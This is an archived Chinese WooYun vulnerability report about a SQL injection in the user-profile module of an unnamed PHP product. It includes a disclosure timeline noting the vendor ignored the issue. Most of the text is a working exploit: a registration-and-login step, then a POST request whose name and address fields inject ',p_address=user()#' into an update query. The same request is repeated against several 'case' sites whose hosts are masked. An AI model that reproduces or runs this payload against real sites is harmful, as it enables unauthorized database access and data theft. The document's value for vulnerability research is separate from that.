乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-15: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-29: 厂商已经主动忽略漏洞,细节向公众公开
RT
官网:http://**.**.**.**下载地址:http://**.**.**.**/download/detail-2.htmlphp版本最新版:exp及案例:案例1:
注册:http://**.**.**.**/passport/admintest/123456登录:http://**.**.**.**/passport/?type=loginexp:http://**.**.**.**/passport/index.php?action=manage&mtype=information&backurl=%2Fpassport%2Findex.php%3Ftype%3Dmanage%26mtype%3Dinformationpost:email=123%**.**.**.**&city=1&sex=1&old=1999&name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'&address=,p_address=user()#&submit=%E6%8F%90%E4%BA%A4
案例2:
http://**.**.**.**admintest123456http://**.**.**.**/passport/index.php?action=manage&mtype=information&backurl=%2Fpassport%2Findex.php%3Ftype%3Dmanage%26mtype%3Dinformationpost:email=123%**.**.**.**&city=1&sex=1&old=1999&name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'&address=,p_address=user()#&submit=%E6%8F%90%E4%BA%A4
案例3:
**.**.**.**/passport/admintest/123456**.**.**.**/passport/index.php?action=manage&mtype=information&backurl=%2Fpassport%2Findex.php%3Ftype%3Dmanage%26mtype%3Dinformationpost:email=123%**.**.**.**&city=1&sex=1&old=1999&name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'&address=,p_address=user()#&submit=%E6%8F%90%E4%BA%A4
案例5:
http://**.**.**.**/passport/admintest/123456http://**.**.**.**/passport/index.php?action=manage&mtype=information&backurl=%2Fpassport%2Findex.php%3Ftype%3Dmanage%26mtype%3Dinformationpost:email=123%**.**.**.**&city=1&sex=1&old=1999&name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'&address=,p_address=user()#&submit=%E6%8F%90%E4%BA%A4
案例6:
案例7:
如上
过滤
未能联系到厂商或者厂商积极拒绝